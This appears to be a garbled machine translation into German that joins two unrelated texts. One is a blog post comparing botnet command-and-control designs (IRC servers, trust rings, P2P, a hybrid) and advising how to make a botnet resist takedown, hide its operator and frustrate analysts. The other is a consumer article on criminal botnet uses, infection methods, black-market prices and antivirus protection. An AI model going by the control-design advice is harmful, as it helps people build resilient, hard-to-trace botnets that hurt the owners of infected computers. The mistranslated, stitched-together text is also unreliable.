Botnet. Wie Botnets erstellt werden. Werkzeuge Schutz gegen Botneten. Erstellen Sie Ihren Combat Botnet-Steuerelement über ein IRC-Netzwerk

Kein Wunder, dass ich einen Entwurf meiner Note über die Netzwerke der Peer veröffentlicht habe. Bemerkungen, die Leser als sehr nützlich waren. Sie inspirierten mich zur weiteren Arbeit in diese Richtung. Was davon passiert ist - schauen Sie unter den Schnitt.

Wie aus dem Namen des Beitrags ersichtlich ist, wird es heute nur über Botnets diskutiert. Über das Teilen von Dateien, Proxy-Netzwerken, PeerBogs und P2P-Währung für eine Weile vergessen.

Unter dem Wort "Botnet" sollte nicht etwas illegal verstanden werden. Wenn der Benutzer freiwillig den "Bot" herunterlädt und installiert, um den Datenverkehr und Rechenressourcen auf die Bedürfnisse des wissenschaftlichen Projekts zu opfern, ist es auch Botnet. Dementsprechend ist Botmaster nicht unbedingt ein Verbrecher. Eine Gruppe von 30 Wissenschaftlern, die an dem wissenschaftlichen Projekt beteiligt sind, ist ebenfalls "Botmaster".

1. BEGTNET-CONTROL über Server

Der einfachste Weg, die Bots zu steuern, besteht darin, den IRC / HTTP-Server zu starten. Dadurch erhalten Bots Befehle und mit seiner Hilfe, um das Ergebnis ihrer Ausführung zu senden.

Ich zeichne, wie ich kann :) In diesem Fall ist die Illustration möglicherweise nicht erforderlich, aber ich beschloss, Sie auf den Schock vorzubereiten, was andere Bilder erzeugt.

  • Sehr einfache Implementierung, insbesondere im Falle von IRC.
  • Schnellantwort-Bots.
  • Sie können Befehle sowohl das gesamte Netzwerk als auch einen bestimmten Bot angeben.
  • Wenn das Netzwerk aus Hunderten von Knoten besteht, reicht ein Kanal in DALnet aus, um es zu verwalten. Für Netzwerke kann es in niedrigen Kosten (etwa 300 Rubel / Monat) größer sein. Webhosting.
  • Im Fall von HTTPTheserver wird durch die Entwicklung einer schönen UI stark vereinfacht. Dies ist wichtig, wenn wir Botnets in einem Web-Service verwenden.
  • Laden Sie den Server auf. Die Anzahl der Knoten in den größten Botneten wird von Millionen gemessen. Um eine solche Menge zu steuern, ist ein Server klein.
  • Wenn mit dem Server etwas passiert (der Unfall im Netzwerk, DDOs, ein Feuer im Rechenzentrum), endet das Netzwerk.
  • Ein Server ist einfach zu starten. Dies kann sowohl den Anbieter als auch die Kaspersky Lab-Produkte auf einem Benutzercomputer erfolgen.
  • Botmaster ist relativ leicht zu finden. Einmal vergaß VPN - Warten Sie auf Gäste in den Ketten.
  • Im Falle von IRCDie Teams erhalten nur Bots online. Wenn der Bot in zwei Minuten nach dem Senden des Teams in den Kanal geht, ist es "nicht im Subjekt".
  • Die Anzahl der Bots und ihre IP können bestimmt werden, indem er in den IRC-Kanal geht. Das Kanalschutzkennwort hilft nicht, da letzterer einfach aus dem Bot-Code ausgegraben ist.

2. Management über das IRC-Netzwerk

Ein logischer Schritt zum Bekämpfen der Minus der vorherigen Methode ist kein Server, sondern mehrere. Meiner Meinung nach ist der einfachste Weg, um Ihr IRC-Netzwerk anzuheben. In diesem Fall fällt die gesamte Verantwortung für die Datenübertragung zwischen den Servern auf das IRC-Protokoll. Von der Seite der Bots befindet sich im Vergleich zur vorherigen Entscheidung keinen Unterschied.

  • Einfache Implementierung, obwohl Sie mit der Konfiguration der Server konfrontiert sein müssen.
  • Bots reagieren immer noch schnell auf Teams.
  • Sie können immer noch einen bestimmten Bot angeben.
  • Lastverteilung zwischen Servern, Schutz vor DDOs und höherer Gewalt. Zziger gute Server können für ein Netzwerk von einer Million Bots ausreichen.
  • Wenn Sie einen Teil der Server ablehnen, können Sie sie mit ihnen ersetzen.
  • Wenn IRC verwendet wird Und verwechseln Sie tausend Bots, die auf demselben Kanal sitzen, verwenden Sie mehrere Kanäle. Dementsprechend können Sie in verschiedenen Teilen des Netzwerks unterschiedliche Aufgaben geben.
  • Wir müssen den Server / VDS verlassen.
  • Sie können alle Server gleichzeitig kaufen, und der BotMaster hat keine Zeit, sie zu ersetzen.
  • Botmaster ist immer noch einfach, um zu verfolgen.
  • Im Falle von IRCDie Anzahl der Bots und ihrer IP ist immer noch in Sicht.
  • Bots, die gerade den Kanal betreten haben, nicht im Subjekt.

Begriff Binden (Trust Ring, Circle / Ring Trust) Ich hörte zuerst von Comrade Nickolas in den Kommentaren zur vorherigen Note. Es ist kurz davor, die Funktion "Server" auf einem Teil des Botnetzes zu vertrauen.

  • Keine Server brauchen.
  • Braeste kann aus Hunderten von Knoten bestehen. Erhöhen und steuern Sie eine solche Anzahl von IRC / HTTP-Servern nicht einfach.
  • Bots sollten die Verbindung nicht ständig mit der Tour halten. Es reicht aus, alle 5-10 Minuten zu überprüfen, wenn neue Befehle nicht angezeigt wurden. Jedes Team sollte TTL haben, während der es in der Tour gespeichert ist.
  • Eine große Anzahl von "Servern" sorgt für die Stabilität des Netzwerks an alle Arten von Katastrophen. Wenn ein Teil des Rings hervorragend ist, kann der Botmaster ein Team zum Erstellen eines neuen Törtchens geben. Oder es kann, dass die Ringe sich selbst knoten lassen (Sie benötigen digitale Signaturen und die Zustimmung eines bestimmten Prozentsatzes von Truds).
  • Lassen Sie die Verkostung aus 512 Knoten bestehen, mindestens 50% sind ständig online. Wenn es 1.000.000 Bots im Netzwerk gibt und jeder von ihnen ständig online ist, haben weniger als 4.000 Bots weniger als 4.000 Bots. Wenn durch die Bot-Befehle (oder beim Senden des Ergebnisses) alle 10 Minuten aufgefordert wird, wird jeder Ringknoten gleichzeitig durchschnittlich 7 Verbindungen verarbeitet. Ziemlich ein bisschen für das Netzwerk dieser Größe, richtig?
  • Nur Botmaster kann die genaue Liste aller Botmaster erhalten.
  • Sie können Befehle einen bestimmten Bot oder eine Gruppe von Bots angeben.
  • Schnelle Flaschenreaktion auf Teams.
  • Botmaster ist schwer zu finden.

Der einzige Minus, den ich sehe, ist die Komplexität der Implementierung.

4. Pirography-Netzwerke.

Wenn Sie mit Internetquellen glauben, sind P2P-Botneten derzeit sehr beliebt. Unter diesen Quellen gibt es größte Aufmerksamkeit. Jeder Knoten eines solchen Netzwerks kennt nur ein paar "benachbarte" Knoten. Der Botmaster sendet Befehle an mehrere Netzwerkknoten, wonach er vom Nachbarn an den Nachbarn übertragen wird.

Die Liste der Nachbarn wird einmal auf einem speziellen Server an Bots ausgegeben. Es kann zum Beispiel gehackte Site sein. Mehr Server tut nichts, es wird nur während der Zugabe von Knoten in Botnet benötigt.

  • Die Implementierung ist etwas einfacher als im vorherigen Absatz.
  • Minimale Belastung aller Netzwerkknoten. Die Größe des Botnetzes ist fast unbegrenzt.
  • Widerstand gegen DDOs, Trennung von Knoten usw. P2P-Botnet ist fast unmöglich zu booten.
  • Keine dauerhaften Verbindungen, wie im Fall von IRC.
  • Benötigen Sie einen Server, wenn auch nicht lange nicht.
  • Knoten von Zeit zu Zeit sterben, was die Netzwerkverbindung beeinflusst.
  • Um eine Liste aller Bots zu erhalten, benötigen Sie beispielsweise einen Befehl, sich auf einen bestimmten Standort zu beziehen. In diesem Fall gibt es keine Garantie, dass die Liste nur BotMaster erhält.
  • Um einem bestimmten Knoten einen Befehl anzugeben, müssen Sie es entweder das gesamte Netzwerk senden oder direkt mit dem Knoten herstellen.
  • Langsame reagierende Bots für Teams.
  • Um einen "langen" Befehl zum Beispiel mit einer Liste der URL senden, müssen Sie einen Drittanbieter-Server verwenden, ansonsten werden die Bots noch mehr verlangsamt.
  • Botmaster ist leichter zu finden als im vorherigen Beispiel aufgrund der Verwendung eines Servers.

Natürlich kann ich mich irren, aber meiner Meinung nach ist die P2P-Botneten viel schlechter als der TART. Vielleicht Hersteller von Antiviren über etwas Schweige?

5. Umfassende Lösung

Eine Möglichkeit, etwas Neues und Gutes zu erfinden - etwas altes gekreuzt. Kombiniert Telefon, Computer, Bandrecorder, Kamera und Camcorder - Erhalten Sie ein Smartphone. Niemand wird von der Computer- und Klimatisierung im Auto nicht überrascht sein. Wir kleben zu jedem Joghurt-Magneten in den Kühlschrank, und der Verkauf steigt aus.

Es ist wichtig, sich daran zu erinnern, dass wir mit dem erfolglosen Kreuzung nichts zu irgendetwas bekommen können. Erinnert genetische Algorithmen, richtig? Nehmen, es scheint, eine gute Idee - P2P-Botnet, wo die Anziehungskraft für die Ernennung von Nachbarn verantwortlich ist. Dann brauchen wir keinen Server!

In diesem Fall wird jedoch die Komplexität der Implementierung zunehmen, wenn auch leicht. Die verbleibenden P2P-Botnet-Probleme bleiben ungelöst. Der Gewinn ist unbedeutend, Konto 1: 1.

Einige, die mit einem Stück Papier und Bleistift sitzen, gab ich die folgende Idee zur Welt. Soweit ich weiß, hatte sie noch nie zuvor geäußert, und ich bin der erste, der zusammenkam. CHSV plus 100.

Dass, wenn das Netzwerk zwei Staaten hat - "aktiv" und "passiv". Im passiven Zustand arbeitet Botnet nach dem P2P-Schema. BotMaster sendet den Befehl, "Truppen mobilisieren" und das Netzwerk zu tausend verwandelt. In seinem Team muss der Botmaster die Knoten der Tour und der Zeit angeben, an die das Netzwerk seinen Zustand ändert. Damit der Ring mehr war, können Sie ein Team mehreren Bots geben, um Ihre Nachbarn anzurufen. Darüber hinaus werden alle Befehle durch die Tour übertragen. Er ist für die Ernennung der neuen Knoten der "Nachbarn" verantwortlich. Wenn sich die TTL-Ringe später ausreichen, können Sie den Befehl "Active Status erweitern" angeben.

Ein solches Botnetz erbte kein einziges Minus-P2P-Netzwerk und verfügt über alle Vorteile des Törtchens sowie:

  • Erhöhte Stabilität von DDOs-Angriffen und Netzwerkfiltern wie dem P2P-Netzwerk.
  • Minimaler Ressourcenverbrauch von Bots während der Netzwerkausfallzeiten. Botmaster muss den Status des Törtchens nicht verfolgen und für ihn neue Knoten auswählen.
  • Beim Erstellen des Autos werden nur diese Knoten ausgewählt, die derzeit online sind. Die Bots werden vom ersten Versuch mit dem Ring verbunden (für eine Weile).
  • Die Liste der "Nachbarn" wird regelmäßig aktualisiert. Alle im temporären Ring enthaltenen IP-Knoten kennt das gesamte Botnetz. Lassen Sie diese Knoten diese Knoten also betrachten, wenn ein Teil der echten Nachbarn lange Zeit nicht im Netzwerk erschienen ist.

Und der einzige Nachteil, den ich hier sehe, ist die Komplexität der Implementierung. Aber es ist nicht wirklich ein Problem.

6. Was ist wichtig zu erinnern?

Bisher schweige ich einige Punkte, weil sie in einem der Namen der Botnet-Steuermethoden inhärent sind. Aufmerksamkeit sollte auf sie konzentriert sein.

  • Ein Teil der Knoten kann nicht ankommende Verbindungen aufgrund von Firewall oder NAT empfangen. Bei einem Minimum ist es notwendig, beim Schreiben eines Bots zu berücksichtigen. Wenn zum Beispiel die Befehle im P2P-Netzwerk verteilt, sollte der Bot in der Lage sein, die Nachbarn selbst regelmäßig auf die Nachbarn zuzugreifen und nicht auf das Team von ihnen zu warten.
  • Es sollte von der Tatsache fortgesetzt werden, dass alle von Netzwerken gesendeten Befehle zugehört werden. Bei einem Minimum kann der interessierte Person den Bot-Code für diese Zwecke ändern. Trotzdem ist es sinnvoll, den gesamten Verkehr auf dem Netzwerk zu verschlüsseln. Auf ein Minimum wird es die Analyse des Botnetzes komplizieren.
  • Alle BotMaster-Befehle müssen von einer digitalen Signatur signiert sein. Passwörter sind nicht geeignet, da sie abgefangen werden können.
  • Sobald es über die Implementierung kam, beobachte ich, dass in jedem Botnet mindestens drei Teams bereitgestellt werden sollten - das Update von Botmaster, das Botmaster-Schlüsselaktualisierung und die Selbstzerstörung des gesamten Netzwerks.
  • Das Netzwerk verfügt über "Spyware" -Knoten. Einige von ihnen sind in der Tour enthalten. Gleichzeitig kennen wir nicht die Ziele, dass diese "Spies" verfolgt werden - dies kann die Definition von IP-Botmaster sein, indem die Ausführung von Teams, Tooltit das Netzwerk durchbricht, die Kontrolle über Botnet und so weiter erlangen. Dies bedeutet insbesondere, dass die Bots beim Verbinden mit dem Ring einen zufälligen Knoten auswählen müssen und nicht die ganze Zeit gleich verwenden.
  • In der Figur sind die Addstrationsknoten jeweils mit jeweils miteinander verbunden, aber viel praktischer, um den Ring in Form eines kleinen P2P-Netzwerks zu realisieren, dh gemäß dem "Nachbarn" -Prinzip.

Ich beobachte auch, dass Lösungen 1 und 2 (Server, viele Server) von vielen Minuten beraubt sind und ein paar Vorteile von der Lösung von 3 (Trust) erhalten, wenn das HTTP-Protokoll verwendet wird. Scrollen Sie wieder durch diese Artikel, um zu verstehen, was ich bin.

7. Schlussfolgerung

Für kleine Netzwerke ist die Verwendung von IRC eine gute Lösung. Wenn Sie beispielsweise Ihr kleines Netzwerk für verteilte Computing erstellen möchten, installieren Sie den Bot auf Ihrem Heimcomputer, Laptop, Netbook, Arbeitscomputer (falls vorhanden, und verwalten Sie das Netzwerk über DALnet. Wenn Sie brauchen, kann später das Netzwerk zum Törtchen "pumpen" sein. Sie strafrechtlich den entsprechenden Befehl, richtig?

Wenn für das BotNet eine schöne Weboberfläche benötigt wird, kann es sinngen, ein zusätzliches Programm zu schreiben, das Befehle vom Webserver übernimmt und sie an den IRC sendet. Diesen Ansatz zumindest in Betracht ziehen.

Universal-Lösungen - Dies ist eine Tour und P2P + Braesting. Solche Netzwerke funktionieren unabhängig davon, unabhängig davon, wie viele Knoten in ihnen, 1 oder 1.000.000, ohne Server.

In Anbetracht der Anwesenheit von offensichtlichen Mängeln im "reinen P2P" im Vergleich zum Ring bleibt es unklar, warum es als eine gute Lösung angesehen wird. Sicherlich in den Bots, von denen aus dem Netzwerk besteht, gibt es viele nützliche Funktionen. Warum nicht noch eine kleine Nutzlast hinzufügen - Mobilisieren Sie das Netzwerk in der Tour?

Hier vielleicht alles. Ich freue mich für jeden, den Ihre Kommentare. Besonders mit Kritik, Anweisungen zu Ungenauigkeiten / Widersprüchen im Text und Ihren Ideen über das erhöhte Thema.

Heute wurden die Botneten zu einem der Hauptwerkzeuge von Cyberkriminalen. Computerbild sagt, was Botnets so ist, wie sie funktionieren und wie Sie Ihren Computer speichern können, um in das Zombie-Netzwerk zu gelangen.

Ein Botnet oder ein Zombie-Netzwerk ist ein Netzwerk von Computern, die mit einem schädlichen Programm infiziert sind, das Angreifer ermöglicht, andere Personen ohne das Wissen der Besitzer aus der Ferne verwalten zu können. In den letzten Jahren ist das Zombie-Netzwerk zu einer stabilen Einkommensquelle für Cyberkriminale geworden. Es gibt konstant niedrige Kosten und ein Minimum an Wissen, das für die Kontrolle von Botnets notwendig ist, zum Wachstum der Beliebtheit beitragen, und daher die Anzahl der Botneten. Bei DDOs-Angriffen oder Spam-Mailing, die mit Zombie-Netzwerken durchgeführt wurden, verdienen Angreifer und ihre Kunden Tausende von Dollar.

Ist mein Computer mit einem Bot infiziert?

Antwort Diese Frage ist nicht einfach. Tatsache ist, dass die Eingriffe von Bots in die tägliche Arbeit des PCs fast unmöglich ist, da er die Geschwindigkeit des Systems nicht beeinträchtigt. Trotzdem gibt es mehrere Anzeichen, für die es möglich ist, festzustellen, dass ein Bot im System vorhanden ist:

Unbekannte Programme versuchen, sich mit dem Internet herzustellen, das periodisch die Firewall- oder Antivirus-Software stört.

Der Internetverkehr wird sehr groß, obwohl Sie das Netzwerk sehr mäßig verwenden.

In der Liste der laufenden Systemprozesse erscheint neue, Maskierung für gewöhnliche Windows-Prozesse (z. B. kann der Bot den Namen scvhost.exe tragen - Dieser Name ist dem Namen des Windows Svchost.exe-Systemprozesses sehr ähnlich. Es ist ziemlich schwierig, den Unterschied zu bemerken, aber es ist möglich).

Warum die Botneten erstellt werden

Batnets werden erstellt, um Geld zu verdienen. Sie können mehrere Bereiche der kommerziell günstigen Nutzung von Zombies auswählen: DDOs-Angriffe, sammeln vertrauliche Informationen, SPAM, Phishing, SEARCH SPAM, Betrug auf Klickzähler usw. Es ist zu beachten, dass jede Richtung rentabel ist, jeder Angreifer tut nicht Wählen Sie, und Botnet ermöglicht alle aufgelisteten Aktivitäten gleichzeitig.

DDOs-Angriff (aus Englisch. Verteiltes Denial-of-Service) ist ein Angriff auf ein Computersystem, zum Beispiel auf einer Website, deren Zweck den Zweck, das System auf den "Herbst" zu bringen, dh die Zustände, wenn es kann nicht mehr empfangen und verarbeiten Anfragen legitime Benutzer. Eine der häufigsten DDOs-Angriffsmethoden besteht darin, zahlreiche Anfragen an einen Computer oder einen Opferstandort zu senden, der zu einer Ablehnung der Wartung führt, wenn die Ressourcen des angegriffenen Computers des Computers nicht ausreichen, um alle eingehenden Anforderungen zu behandeln. DDOs-Angriffe sind beeindruckende Hackerwaffen, und Botnet ist ein ideales Werkzeug für ihre Holding.

DDOs-Angriffe können sowohl ein Mittel zum unfairen Wettbewerbskämpfen und Handlungen des Cyberrorismus sein. Der Host von Botnetz kann einen Service für jeden nicht allzu skrupulösen Unternehmer haben - um einen DDOs-Angriff auf den Standort seines Mitbewerbers zu halten. Die angegriffene Ressource nach einer solchen Last "WILL" erhält der Kunde des Angriffs einen temporären Vorteil, und Cyberkriminalität ist eine bescheidene (oder nicht sehr) Belohnung.

Auf dieselbe Weise können Botnet-Besitzer selbst DDOs-Angriffe verwenden, um Geld von großen Unternehmen zu erpressen. Gleichzeitig ziehen es Unternehmen vor, die Anforderungen von Cyberkriminalen zu erfüllen, da die Beseitigung der Folgen erfolgreicher DDOs-Angriffen sehr teuer ist. Zum Beispiel wurde im Januar 2009 einer der größten Hofer von Godaddy.com einem DDOs-Angriff unterworfen, wodurch Tausende von Sachen, die auf seinen Servern aufgestellt wurden, für fast einen Tag nicht erreichbar waren. Die finanziellen Verluste des Hosts waren riesig.

Im Februar 2007 wurden einige Angriffe auf den Wurzel-DNS-Servern festgehalten, wobei das normale Funktion des gesamten Internets direkt von der Operation abhängt. Es ist unwahrscheinlich, dass der Zweck dieser Angriffe der Zusammenbruch des weltweiten Netzwerks war, da das Vorhandensein von Zombie-Netzwerken nur unter der Bedingung möglich ist und normalerweise das Internet betreibt. Vor allem war es der Demonstration der Kraft und Möglichkeiten von Zombie-Netzwerken ähnlich.

Werbungsdienste für die Umsetzung von DDOs-Angriffen, die auf vielen Foren relevanter Themen offen gepostet wurden. Angriffspreise schwanken von 50 bis mehreren tausend Dollar pro Tag des kontinuierlichen DDOs-Botnet-Betriebs. Nach Angaben der Site www.shadowserver.org, für 2008 wurden rund 190 tausend DDOs-Angriffe abgehalten, auf denen Cyberkriminelle etwa 20 Millionen US-Dollar verdienen konnten. Natürlich beinhaltet dieser Betrag keine Erträge aus der Erpressung, die einfach nicht berechnet werden kann.

Vertrauliche Informationen sammeln

Vertrauliche Informationen, die auf den Computern der Benutzer gespeichert sind, ziehen immer Eindringlinge an. Kreditkartennummern, Finanzinformationen und Passwörter für verschiedene Dienstleistungen sind das größte Interesse: Postfächer, FTP-Server, "Messengers" und andere. Gleichzeitig können moderne schädliche Programme den Angreifer genau die von ihnen interessanten Daten auswählen - für diese reicht aus, um ein relevantes Modul herunterzuladen.

Malefektoren können entweder gestohlene Informationen verkaufen oder in ihren eigenen Interessen verwenden. Hunderte von Anzeigen zum Verkauf von Bankkonten erscheinen auf zahlreichen Foren online. Die Kosten des Kontos hängen von dem Geldbetrag auf dem Konto des Benutzers ab und reicht von 1 bis 1.500 US-Dollar. Die untere Grenze deutet darauf hin, dass während des Wettbewerbskampfes Cyberkriminelle, die an dieser Art von Geschäft beteiligt sind, um die Preise zu senken. Um mehr als viel zu verdienen, benötigen sie einen stabilen Zustrom von frischen Daten, und dafür ist ein stabiles Wachstum von Zombie-Netzwerken erforderlich. Besonders interessante Finanzinformationszeichnern - Angreifer in gefälschten Bankkarten.

Soweit solche Operationen sind, ist es möglich, die bekannte Geschichte mit einer Gruppe brasilianischer Cyberkriminale zu beurteilen, die vor zwei Jahren verhaftet wurden. Sie konnten gewöhnliche Benutzer aus Bankkonten von 4,74 Millionen Dollar mit den mit Computern gestohlenen Informationen entfernen. Beim Erwerb von personenbezogenen Daten, die keine direkte Beziehung zu Nutzergeld haben, und Kriminelle, die in gefälschten Dokumenten tätig sind, die Eröffnung der gefälschten Bankkonten, der illegalen Transaktionen usw.

Eine andere Art von Informationen, die von den BATTNETS erhoben werden, sind E-Mail-Adressen, und im Gegensatz zu Kreditkartennummern und Konten können eine Vielzahl von E-Mail-Adressen aus dem Adressbuch eines infizierten PCs gelernt werden. Die gesammelten Adressen werden zum Verkauf ausgestellt, und manchmal "für Gewicht" - ein ärmer. Die wichtigsten Käufer eines solchen "Produkts" sind Spammer. Die Liste einer Million E-Mail-Adressen kostet 20 bis 100 Dollar, und der auf die gleichen Mio.-Adressen bestellte Newsletter beträgt 150-200 Dollar. Der Nutzen ist offensichtlich.

Kriminelle interessieren sich auch an Konten für verschiedene bezahlte Dienstleistungen und Online-Shops. Natürlich sind sie billiger als Bankkonten, aber ihre Umsetzung ist mit einem geringeren Risiko der Verfolgung von Strafverfolgungsbehörden verbunden.

Millionen von Spam-Nachrichten laufen jeden Tag auf der ganzen Welt. Mailing von einer ausdürsigen E-Mail ist eine der Hauptfunktionen moderner Botnets. Nach dem Kaspersky Lab wird etwa 80% des gesamten Spams über das Zombie-Netzwerk gesendet. Milliarden Briefe mit Werbung "Viagra", Kopien teurer Stunden, Online-Casinos usw. werden von den Lautsprechern der "Viagra", Kopien teurer Stunden, Online-Casinos usw. gesendet, die Kommunikationskanäle und Postfächer erzielen. So setzen Hacker unter den Computer in beliebigen anderen Benutzern unter den Punch von Computern: Die Adressen, aus denen die Verteilung in schwarzen Listen von Antivirenunternehmen durchgeführt wird.

In den letzten Jahren hat sich Sphäre Sphäre ausgebaut: ICQ Spam, Spam auf sozialen Netzwerken, Foren, Foren, Blogs erschienen. Und dies ist auch ein "Verdienst" von Botnet-Besitzern: Immerhin ist es völlig einfach, dem Bot-Client ein zusätzliches Modul hinzuzufügen, das den Horizonten für das neue Geschäft mit Slogans wie "Spam auf Facebook öffnet. Kostengünstig. " Die Spam-Preise variieren je nach Zielgruppe und der Anzahl der Adressen, zu denen die Verteilung durchgeführt wird. Die Preise für die Preise für Ziele - ab 70 US-Dollar über Hunderttausende von Adressen von bis zu 1.000 US-Dollar pro Zzgl. Mio. Millionen von Adressen. Im vergangenen Jahr verdienten Spammer etwa 780 Millionen Dollar beim Senden von Briefen.

Erstellen eines Suchspams

Eine weitere Möglichkeit der Verwendung von BotNets besteht darin, die Beliebtheit von Websites in Suchmaschinen zu erhöhen. Wenn Sie an der Suchmaschinenoptimierung arbeiten, versuchen Ressourcenadministratoren, die Position des Standorts in den Suchergebnissen zu erhöhen, denn je höher, desto mehr Besucher gehen mehr Besucher über Suchmaschinen und desto mehr ist der Umsatz der Site Eigentümer, zum Beispiel der Verkauf von Werbefläche auf Webseiten. Viele Unternehmen zahlen viel Geld für Webmeistungen, damit sie die Website in die erste Position in den "Suchmaschinen" bringen. Botnet-Besitzer spießen einige ihrer Techniken aus und automatisierten den Suchmaschinenoptimierungsprozess.

Wenn Sie in den Kommentaren zu Ihrem Rekord in der "Live-Journal" oder einem erfolgreichen Foto auf dem Foto-Hosting sehen, werden viele Links, die von der Ihnen unbekannten Person erstellt wurden, und manchmal Ihr "Freund" - nicht überrascht sein: Nur jemand Bestellt die Förderung Ihrer Ressource an die Eigentümer Botnet. Ein speziell erstelltes Programm wird in einen Zombie-Computer geladen, und lässt im Namen seines Besitzers Kommentare zu den beliebten Ressourcen mit Bezug auf die Spinnstelle. Der Durchschnittspreis für illegale Sucht-Spam-Services beträgt etwa 300 Dollar pro Monat.

Wie viele personenbezogene Daten kosten

Die Kosten für gestohlene personenbezogene Daten hängen direkt von dem Land ab, in dem ihr juristischer Eigentümer lebt. Zum Beispiel beträgt die Gesamtdaten des US-Bewohners 5-8 Dollar. Auf dem schwarzen Markt sind diese Bewohner der Europäischen Union besonders geschätzt - sie sind zwei bis dreimal teurer als die Daten der US-amerikanischen Bürger und Kanada. Dies kann dadurch erklärt werden, dass solche Datenkriminelle in jedem in der EU enthaltenen Land genießen können. Der Preis eines vollständigen Datenpakets einer Person beträgt im Durchschnitt etwa 7 US-Dollar.

Leider ist derjenige, der sich entschieden hat, "von Grund auf", um ein Botnetz zu organisieren, nicht viel schwierig sein, einen Anweisungen zum Erstellen eines Zombie-Netzwerks im Internet zu finden. Erster Schritt: Erstellen Sie ein neues Zombie-Netzwerk. Infizieren Sie dazu die Benutzer von Benutzern mit einem speziellen Programm - Bot. Für Infektionen, Spam-Mailing, Posting-Nachrichten in Foren und sozialen Netzwerken und anderen Techniken; Oft ist der Bot mit einer Selbstverletzungsfunktion wie Viren oder Würmer ausgestattet.

Um ein potenzielles Opfer, um einen Bot zu etablieren, nutzen Sie Social Engineering-Techniken. Zum Beispiel wird es angeboten, ein interessantes Video zu sehen, das einen speziellen Codec herunterladen erfordert. Nach dem Herunterladen und Beginn einer solchen Datei wird der Benutzer natürlich keine Videos sehen und höchstwahrscheinlich keine Änderungen nicht bemerken, und sein PC wird infiziert und wird zu einem unterwürfigen Diener, der alle Befehle der Host des Botnetzes.

Die zweite weit verbreitete Infektionsmethode mit Bots ist ein Drive-by-Download. Wenn Sie die infizierte Webseite des Benutzers auf seinem Computer über verschiedene "Löcher" in Anwendungen besuchen - zuerst in beliebten Browsern, wird schädlicher Code geladen. Für den Betrieb von Schwächen werden spezielle Programme verwendet - Exploits. Sie erlauben nicht nur unmerklich heruntergeladen, sondern starten auch einen Virus oder Bot nicht unmerklich. Diese Art von Malware-Spread ist am gefährlichsten, denn wenn eine beliebte Ressource gehackt wird, werden Zehntausende von Benutzern verletzt!

Der Bot kann von der Selbstverbreitung auf Computernetzwerken fasziniert werden. Beispielsweise kann es verteilt werden, indem Sie alle verfügbaren ausführbaren Dateien infizieren oder mit anfälligen Netzwerkcomputern suchen und infiziert werden.

Infizierte Computer. Nichts vermutet Benutzer Der Creator von Botnet kann mit dem Botnet-Befehlszentrum gesteuert werden, das über den IRC-Kanal, einer Webverbindung oder mithilfe von anderen verfügbaren Werkzeugen an Bots bindet. Es reicht aus, mehrere Dutzend Autos in das Netzwerk zu kombinieren, damit der Botnetz mit dem Einkommen in seinen Master begann. Darüber hinaus ist dieses Einkommen in linearer Abhängigkeit von der Stabilität des Zombie-Netzwerks und seiner Wachstumsraten.

Werbungsgesellschaften, die online tätig sind, die nach dem PPC-Programm (Pay-per-Click) online für einzigartige Klicks auf die Links zu den auf dem Internet geposteten Anzeigen zahlen. Für die Baptnet-Besitzer ist die Täuschung solcher Unternehmen eine profitable Beschäftigung. Beispielsweise können Sie ein bekanntes Netzwerk von Google AdSense annehmen. Die darin enthaltenen Werbetreibenden zahlen Google für Klicks auf geposteten Anzeigen in der Hoffnung, dass der Benutzer, der "auf das Licht" aussah, etwas von ihnen kaufen wird.

Google ist wiederum kontextuelle Werbung an verschiedenen Standorten, die am ADSense-Programm beteiligt sind, und zahlen den Prozentsatz des Site-Inhabers von jedem Klick. Leider sind nicht alle Sehenswürdigkeiten ehrlich. Ein Zombie-Netzwerk mit einem Zombie-Netzwerk kann ein Hacker Tausende von einzelnen Klicks pro Tag generieren - mit jeder Maschine, um nicht einen besonderen Verdacht von Google zu verursachen. Das für die Werbegesellschaft ausgegebene Geld wird also in eine Tasche zum Hacker fließen. Leider gab es keinen einzigen Fall, wenn jemand nach solchen Aktien angezogen wurde. Nach Klickforensik, im Jahr 2008, wurden etwa 16-17% aller Übersetzungen auf Werbeverbindungen gefälscht, von denen der dritte von einem Botnetz erzeugt wurde. Nach unkomplizierten Berechnungen kann verstanden werden, dass das letzte Jahr die Besitzer der Botnets "stecken" 33.000.000 Dollar festsitzen. Nicht schlechtes Einkommen von Klicks mit der Maus!

Die Angreifer und Unrein-On-Hand-Geschäftsleute schaffen nicht unbedingt nicht unbedingt kein Botnetz "von scratch". Batneten verschiedener Größen und Leistung, die sie von Hackern kaufen oder mieten können - beispielsweise durch Kontaktieren von Fachforen.

Die Kosten des fertigen Botnetzes sowie der Kosten des Mietvertrags hängen direkt von der Anzahl der darin enthaltenen Computer ab. Die größte Beliebtheit der fertigen Botnets genießt in englischsprachigen Foren.

Kleine Batnets, bestehend aus mehreren hundert Bots, kosten von 200 bis 700 Dollar. Gleichzeitig beträgt der Durchschnittspreis eines Bots etwa 50 Cent. Größere Botneten sind großes Geld.

Das Schattenzombie-Netzwerk, das vor einigen Jahren von einem 19-jährigen Hacker aus Holland erstellt wurde, hatte mehr als 100 Tausend Computer weltweit, die weltweit, für 25.000 Euro verkauft wurden. Für dieses Geld können Sie in Spanien ein kleines Haus kaufen, jedoch bevorzugt der Verbrecher aus Brasilien, um ein Botnetz zu erwerben.

Schutzmittel gegen Botneten

1. Zunächst sind dies Anivatprogramme und umfassende Pakete, um sich gegen Internet-Bedrohungen mit regelmäßig aktualisierten Basen zu schützen. Sie werden nicht nur dazu beitragen, die Gefahr rechtzeitig zu erkennen, sondern auch, um ihn zu beseitigen, bevor Ihr Zombie den treuen "Eisenfreund" drehen wird, um Spam- oder "Drop" -Es zu senden. Umfassende Pakete wie Kaspersky Internet Security 2009, enthalten eine vollständige Reihe von Schutzfunktionen, die über ein gemeinsames Kommandozentrum verwaltet werden können.

Das Anti-Virus-Modul im Hintergrund führt das Scannen der wichtigsten Systembereichen durch und steuert alle möglichen Möglichkeiten, um Viren einzudringen: E-Mail-Anhänge und möglicherweise gefährliche Websites.

Firewall überwacht den Datenaustausch zwischen einem PC und dem Internet. Es prüft alle Datenpakete, die vom Netzwerk erhalten oder an dort gesendet werden, und blockiert ggf. Netzwerkangriffe und verhindert das geheime Senden personenbezogener Daten im Internet.

Der Spam-Filter schützt das Postfach vor dem Eindringen von Werbebotschaften. Seine Aufgabe umfasst auch die Identifizierung von Phishing-Briefen, mit der Angreifer, Informationen über seine Daten zu ertragen, um Online-Zahlungen oder Bankensysteme zu ertragen.

